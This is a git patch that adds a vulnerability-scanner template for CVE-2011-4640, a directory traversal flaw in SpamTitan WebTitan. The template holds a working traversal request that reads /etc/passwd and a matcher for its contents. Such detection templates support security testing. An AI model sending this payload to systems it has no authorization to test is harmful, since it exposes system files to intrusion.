From d078790f270a74a995dcb1dcdaf538c0680c758a Mon Sep 17 00:00:00 2001 From: ctflearner <98345027+ctflearner@users.noreply.github.com> Date: Fri, 6 Oct 2023 11:36:38 +0530 Subject: [PATCH] Create CVE-2011-4640.yaml --- http/cves/2011/CVE-2011-4640.yaml | 35 +++++++++++++++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 http/cves/2011/CVE-2011-4640.yaml diff --git a/http/cves/2011/CVE-2011-4640.yaml b/http/cves/2011/CVE-2011-4640.yaml new file mode 100644 index 0000000000..f196410ce7 --- /dev/null +++ b/http/cves/2011/CVE-2011-4640.yaml @@ -0,0 +1,35 @@ +id: CVE-2011-4640 + +info: + name: WebTitan Versions prior to 3.60 - Local File Inclusion + author: ctflearner + severity: medium + description: Directory traversal vulnerability in logs-x.php in SpamTitan WebTitan before 3.60 allows remote authenticated users to read arbitrary files via a .. (dot dot) in the fname parameter in a view action. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2011-4640 + - https://www.exploit-db.com/exploits/37943 + + classification: + cvss-metrics: AV:N/AC:L/Au:S/C:P/I:N/A:N + cvss-score: 4.0 + cve-id: CVE-2011-4640 + cwe-id: CWE-22 + cpe: cpe:2.3:a:spamtitan:webtitan:*:*:*:*:*:*:*:* + tags: lfi,SpamTitan, WebTitan,cve-2011 + + +http: + - method: GET + path: + - "{{BaseURL}}//logs-x.php? jaction=view&fname=../../../../../etc/passwd" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200